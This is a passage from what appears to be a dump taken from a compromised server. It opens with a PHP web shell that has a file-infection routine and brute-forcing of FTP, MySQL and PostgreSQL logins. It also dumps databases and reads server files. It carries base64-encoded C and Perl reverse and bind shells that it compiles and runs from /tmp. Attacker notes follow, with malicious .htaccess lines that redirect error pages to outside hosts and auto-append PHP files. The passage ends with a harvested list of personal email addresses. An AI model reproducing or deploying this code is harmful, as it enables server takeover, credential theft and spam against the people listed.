       } else {
        array_push($files, $dir . "/" . $file);
       }
      }
     }
     closedir($dh);
     return $files;
    }
   }
   foreach (ListFiles($target) as $key=>$file){
    $nFile = substr($file, -4, 4);
    if($nFile == ".php" ){
     if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
      echo "$file<br>";
      $i++;
     }
    }
   }
   echo "<font color=red size=14>$i</font>";
  }else{
   echo "<form method=post><input type=submit value=Infect name=infet></form>";
   echo 'Really want to infect the server?&nbsp;<a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
  }
 hardFooter();
}
function actionBruteforce() {
 hardHeader();
 if( isset($_POST['proto']) ) {
  echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
  if( $_POST['proto'] == 'ftp' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $fp = @ftp_connect($ip, $port?$port:21);
    if(!$fp) return false;
    $res = @ftp_login($fp, $login, $pass);
    @ftp_close($fp);
    return $res;
   }
  } elseif( $_POST['proto'] == 'mysql' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
    @mysql_close($res);
    return $res;
   }
  } elseif( $_POST['proto'] == 'pgsql' ) {
   function bruteForce($ip,$port,$login,$pass) {
    $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
    $res = @pg_connect($str);
    @pg_close($res);
    return $res;
   }
  }
  $success = 0;
  $attempts = 0;
  $server = explode(":", $_POST['server']);
  if($_POST['type'] == 1) {
   $temp = @file('/etc/passwd');
   if( is_array($temp) )
    foreach($temp as $line) {
     $line = explode(":", $line);
     ++$attempts;
     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
      $success++;
      echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
     }
     if(@$_POST['reverse']) {
      $tmp = "";
      for($i=strlen($line[0])-1; $i>=0; --$i)
       $tmp .= $line[0][$i];
      ++$attempts;
      if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
       $success++;
       echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
      }
     }
    }
  } elseif($_POST['type'] == 2) {
   $temp = @file($_POST['dict']);
   if( is_array($temp) )
    foreach($temp as $line) {
     $line = trim($line);
     ++$attempts;
     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
      $success++;
      echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
     }
    }
  }
  echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
 }
 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
  .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
  .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
  .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
  .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
  .'<input type=hidden name=ne  value="">'
  .'<span>Server:port</span></td>'
  .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
  .'<tr><td><span>Brute type</span></td>'
  .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
  .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
  .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
  .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
  .'<td><input type=text name=login value="root"></td></tr>'
  .'<tr><td><span>Dictionary</span></td>'
  .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
  .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
 echo '</div><br>';
 hardFooter();
}
function actionSql() {
 class DbClass {
  var $type;
  var $link;
  var $res;
  function DbClass($type) {
   $this->type = $type;
  }
  function connect($host, $user, $pass, $dbname){
   switch($this->type) {
    case 'mysql':
     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
     break;
    case 'pgsql':
     $host = explode(':', $host);
     if(!$host[1]) $host[1]=5432;
     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
     break;
   }
   return false;
  }
  function selectdb($db) {
   switch($this->type) {
    case 'mysql':
     if (@mysql_select_db($db))return true;
     break;
   }
   return false;
  }
  function query($str) {
   switch($this->type) {
    case 'mysql':
     return $this->res = @mysql_query($str);
     break;
    case 'pgsql':
     return $this->res = @pg_query($this->link,$str);
     break;
   }
   return false;
  }
  function fetch() {
   $res = func_num_args()?func_get_arg(0):$this->res;
   switch($this->type) {
    case 'mysql':
     return @mysql_fetch_assoc($res);
     break;
    case 'pgsql':
     return @pg_fetch_assoc($res);
     break;
   }
   return false;
  }
  function listDbs() {
   switch($this->type) {
    case 'mysql':
                        return $this->query("SHOW databases");
    break;
    case 'pgsql':
     return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
    break;
   }
   return false;
  }
  function listTables() {
   switch($this->type) {
    case 'mysql':
     return $this->res = $this->query('SHOW TABLES');
    break;
    case 'pgsql':
     return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
    break;
   }
   return false;
  }
  function error() {
   switch($this->type) {
    case 'mysql':
     return @mysql_error();
    break;
    case 'pgsql':
     return @pg_last_error();
    break;
   }
   return false;
  }
  function setCharset($str) {
   switch($this->type) {
    case 'mysql':
     if(function_exists('mysql_set_charset'))
      return @mysql_set_charset($str, $this->link);
     else
      $this->query('SET CHARSET '.$str);
     break;
    case 'pgsql':
     return @pg_set_client_encoding($this->link, $str);
     break;
   }
   return false;
  }
  function loadFile($str) {
   switch($this->type) {
    case 'mysql':
     return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
    break;
    case 'pgsql':
     $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;");
     $r=array();
     while($i=$this->fetch())
      $r[] = $i['file'];
     $this->query('drop table hard2');
     return array('file'=>implode("\n",$r));
    break;
   }
   return false;
  }
  function dump($table, $fp = false) {
   switch($this->type) {
    case 'mysql':
     $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
     $create = mysql_fetch_array($res);
     $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
     $this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
     while($â = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }
      $columns = array();
      foreach($â as $k=>$v) {
                            if($v === null)
                                $â[$k] = "NULL";
                            elseif(is_int($v))
                                $â[$k] = $v;
                            else
                                $â[$k] = "'".@mysql_real_escape_string($v)."'";
       $columns[] = "`".$k."`";
      }
                        if($head) {
                            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')';
                            $head = false;
                        } else
                            $sql .= "\n\t,(".implode(", ", $â).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                        $i++;
     }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
    break;
    case 'pgsql':
     $this->query('SELECT * FROM '.$table);
     while($â = $this->fetch()) {
      $columns = array();
      foreach($â as $k=>$v) {
       $â[$k] = "'".addslashes($v)."'";
       $columns[] = $k;
      }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
     }
    break;
   }
   return false;
  }
 };
 $db = new DbClass($_POST['type']);
 if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) {
  $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
  $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
    $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
 }
 hardHeader();
 echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
<td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
<td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>";
 $tmp = "<input type=text name=sql_base value=''>";
 if(isset($_POST['sql_host'])){
  if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
   switch($_POST['charset']) {
    case "Windows-1251": $db->setCharset('cp1251'); break;
    case "UTF-8": $db->setCharset('utf8'); break;
    case "KOI8-R": $db->setCharset('koi8r'); break;
    case "KOI8-U": $db->setCharset('koi8u'); break;
    case "cp866": $db->setCharset('cp866'); break;
   }
   $db->listDbs();
   echo "<select name=sql_base><option value=''></option>";
   while($â = $db->fetch()) {
    list($key, $value) = each($â);
    echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
   }
   echo '</select>';
  }
  else echo $tmp;
 }else
  echo $tmp;
 echo "</td>
    <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
   </tr>
  </table>
  <script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
   function st(t,l) {
    d.sf.p1.value = 'select';
    d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
    d.sf.submit();
   }
   function is() {
    for(i=0;i<d.sf.elements['tbl[]'].length;++i)
     d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
   }
  </script>";
 if(isset($db) && $db->link){
  echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
   if(!empty($_POST['sql_base'])){
    $db->selectdb($_POST['sql_base']);
    echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
    $tbls_res = $db->listTables();
    while($â = $db->fetch($tbls_res)) {
     list($key, $value) = each($â);
                    if(!empty($_POST['sql_count']))
                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
     $value = htmlspecialchars($value);
     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
    }
    echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
    if(@$_POST['p1'] == 'select') {
     $_POST['p1'] = 'query';
                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
     $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
     $num = $db->fetch();
     $pages = ceil($num['n'] / 30);
                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
                    echo " of $pages";
                    if($_POST['p3'] > 1)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
                    if($_POST['p3'] < $pages)
                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
                    $_POST['p3']--;
     if($_POST['type']=='pgsql')
      $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
     else
      $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
     echo "<br><br>";
    }
    if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
     $db->query(@$_POST['p2']);
     if($db->res !== false) {
      $title = false;
      echo '<table width=100% cellspacing=1 cellpadding=2 class=main>';
      $line = 1;
      while($â = $db->fetch()) {
       if(!$title) {
        echo '<tr>';
        foreach($â as $key => $value)
          echo '<th>'.$key.'</th>';
        reset($â);
        $title=true;
        echo '</tr><tr>';
        $line = 2;
       }
       echo '<tr class="l'.$line.'">';
       $line = $line==1?2:1;
       foreach($â as $key => $value) {
        if($value == null)
          echo '<td><i>null</i></td>';
        else
          echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
       }
       echo '</tr>';
      }
      echo '</table>';
     } else {
      echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
     }
    }
    echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
                    echo htmlspecialchars($_POST['p2']);
                echo "</textarea><br/><input type=submit value='Execute'>";
    echo "</td></tr>";
   }
   echo "</table></form><br/>";
            if($_POST['type']=='mysql') {
                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
                if($db->fetch())
                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
            }
   if(@$_POST['p1'] == 'loadfile') {
    $file = $db->loadFile($_POST['p2']);
    echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
   }
 } else {
        echo htmlspecialchars($db->error());
    }
 echo '</div>';
 hardFooter();
}
function actionNetwork() {
 hardHeader();
 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
 $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
 $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";
 $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
 echo "<h1>Network tools</h1><div class=content>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>
 <span>Bind port to /bin/sh</span><br/>
 Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'>
 </form>
 <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>
 <span>Back-connect to</span><br/>
 Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'>
 </form><br>";
 if(isset($_POST['p1'])) {
  function cf($f,$t) {
   $w=@fopen($f,"w") or @function_exists('file_put_contents');
   if($w) {
    @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
    @fclose($w);
   }
  }
  if($_POST['p1'] == 'bpc') {
   cf("/tmp/bp.c",$bind_port_c);
   $â = ex("gcc -o /tmp/bp /tmp/bp.c");
   @unlink("/tmp/bp.c");
   $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>";
  }
  if($_POST['p1'] == 'bpp') {
   cf("/tmp/bp.pl",$bind_port_p);
   $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>";
  }
  if($_POST['p1'] == 'bcc') {
   cf("/tmp/bc.c",$back_connect_c);
   $â = ex("gcc -o /tmp/bc /tmp/bc.c");
   @unlink("/tmp/bc.c");
   $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>";
  }
  if($_POST['p1'] == 'bcp') {
   cf("/tmp/bc.pl",$back_connect_p);
   $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
   echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>";
  }
 }
 echo '</div>';
 hardFooter();
}
if( empty($_POST['a']) )
 if(isset($â) && function_exists('action' . $â))
  $_POST['a'] = $â;
 else
  $_POST['a'] = 'FilesMan';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
 call_user_func('action' . $_POST['a']);
?>

used smarty to upload: /home/www/confixx/html/include/template/templates_c

/home/www/confixx/html/webapps:

ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 406 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 408 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 500 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 501 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 502 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 503 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 504 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 505 http://nicomagen.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13063658424483.php"
ErrorDocument 400 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 403 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 404 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 405 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 406 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 408 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 500 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 501 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 502 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 503 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 504 http://ritch60620.cz.cc/ht_er_docs/
ErrorDocument 505 http://ritch60620.cz.cc/ht_er_docs/
AddHandler application/x-httpd-php .html .htm
php_value auto_append_file "/tmp/13065345007035.php"

for files

./formmail/.htaccess
./bbclone/.htaccess
./nucleus/.htaccess
./phpbannerexchange/.htaccess
./xaraya/.htaccess
./YaBB/.htaccess
./bookstore/.htaccess
./eGroupWare/.htaccess
./zencart/.htaccess
./PHProjekt/.htaccess
./MovableType/.htaccess
./phpwhois/.htaccess
./phpSupportTickets/.htaccess
./weberp/.htaccess
./WebShopmanager/.htaccess
./phpwebsite/.htaccess
./osCommerce/.htaccess
./dotproject/.htaccess
./TUTOS/.htaccess
./phpBugTracker/.htaccess
./skins/.htaccess
./phpdocumentor/.htaccess
./gallery/.htaccess
./WebCalendar/.htaccess
./Drupal/.htaccess
./Mambo/.htaccess
./phpmyforum/.htaccess
./Links/.htaccess
./phpDig/.htaccess
./phpAds/.htaccess
./phpwcms/.htaccess
./Care2x/.htaccess
./UebiMiau/.htaccess
./Tellme/.htaccess
./classifieds/.htaccess
./phpBBAuction/.htaccess
./guestbook/.htaccess
./SupportLogic/.htaccess
./xoops/.htaccess
./b2evolution/.htaccess
./template/.htaccess
./Events/.htaccess
./HelpCenterLive/.htaccess
./phpBook/.htaccess
./SSM/.htaccess
./AdvancedPoll/.htaccess
./pLog/.htaccess
./gtchat/.htaccess
./WordPress/.htaccess
./Siteframe/.htaccess
./openit/.htaccess
./squirrelmail/.htaccess
./noahclass/.htaccess
./knowledgetree/.htaccess
./agoracart/.htaccess
./kplaylist/.htaccess
./CSLH/.htaccess
./wbbook/.htaccess
./phpMyFamily/.htaccess
./videodb/.htaccess
./PostNuke/.htaccess
./vstat/.htaccess
./DocFAQ/.htaccess
./creloaded/.htaccess
./openbiblio/.htaccess
./phpnuke/.htaccess
./getid/.htaccess
./cubecart/.htaccess
./topdownloads/.htaccess
./phpsurveyor/.htaccess
./pmachinefree/.htaccess
./Coppermine/.htaccess
./phpWiki/.htaccess
./sendcard/.htaccess
./phpList/.htaccess
./Owl/.htaccess
./escene/.htaccess
./AutoIndex/.htaccess
./4images/.htaccess
./xrms/.htaccess
./typo/.htaccess
./phpMoney/.htaccess
./tsep/.htaccess
./osTicket/.htaccess
./mediawiki/.htaccess
./phpBB/.htaccess
./geeklog/.htaccess

11.txt

Anna.Caldelari@giubiasco.ch
BACOLE@DCONET.CH
Bernhard.schuepbach@ontour.ch
E.Abt@alineabasel.ch
Erjona.shahinaj@hotmail.com
Esther@vanhest.ch
Gunnar@5Leos.ch
Gunnar@5Leos.de
Info@roal.ch
KBMASSAGE@gmx.ch
Liechti@hr-gastro.ch
Mail@peterkaeser.ch
REUFUSREXX@AOL.COM
S.Galliker@settelen.ch
Thomas.Schmid@psgarbon.ch
a.albizzati@roal.ch
a.ebner@delivros.ch
a.felzani@maler-scorpion.ch
a.grob@delivros.ch
a.hauri1@bluewin.ch
a.megna@maler-scorpion.ch
aaron.gygax@dalchenhof.ch
adi@centraldubs.com
admin@carpnet.ch
admin@expedition-earth.com
admin@svdi.ch
admin@wohnmobilforum-schweiz.ch
aknupfer@oykos.ch
alert@sotrasma.ch
alessia.zanetti@zurich.ch
andrea.hipp@gullo.ch
andrea@leupis.ch
andreas.gygax@dalchenhof.ch
andreas.hirt@vclyss.ch
andreas.huber@erne.net
angelika@5leos.ch
arca@famigliediurne.ch
argiolas.giada@gmail.com
armin.xylander@real-stein.ch
backup@sotrasma.ch
barbara.loria12@gmail.com
bartkowiak_mariola@icloud.com
beat-man@voodoorhythm.com
beatrice.roos@schafferei.com
bella@voodoorhythm.com
ben.humphries@majorplayers.co.uk
beni.rieder@outlet24.ch
bianca.bosshard@richards-gold.ch
blue@jane-w.ch
booking@voodoorhythm.com
buss@lutzbuss.ch
c.abderhalden@houseofjeans.ch
